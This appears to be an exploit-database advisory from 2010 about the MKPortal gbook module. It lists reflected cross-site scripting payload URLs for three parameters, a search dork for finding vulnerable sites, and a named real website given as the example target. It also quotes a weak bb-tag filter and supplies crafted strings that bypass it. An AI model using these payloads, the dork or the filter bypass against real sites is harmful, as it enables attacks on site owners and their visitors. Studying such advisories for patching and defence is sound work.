Home / os / winme

mkportalgbook-xss.txt

Posted on 03 April 2010





==========================================
MKPortal <= gbook module XSS Vulnerability
==========================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com

##################################################
Vulnerable products: MKPortal module gbook Exploit
Dork: "inurl:index.php?Ind=gbook"
##################################################


---------------------------------------------------------------------

1. Multiple pXSS
Vulnerability in the file index.php.

Exploit:


/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E


Example:

http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------------------------------------------------


2. Insert prohibited bb-tags [img] and [url] in the message

Vulnerability in the file index.php.
A vulnerable piece of code:

$message = stripslashes($message);
$message = preg_replace('/[URL=(.+?)](.+)[/URL]/i',$no_url,$message);
$message = preg_replace('/[IMG](.+?)[/IMG]/i',$no_img,$message);
$message = str_replace("ttp","", $message);

get around restrictions:

[UttpRL=htttptp://inj3ct0r.com]inj3ct0r.com[/URL]
[IMttpG]htttptps://inj3ct0r.org/image.php?i=1&dateline=[/IMG]


# Inj3ct0r.com [2010-04-04]

 

TOP

Malware :

Exploits :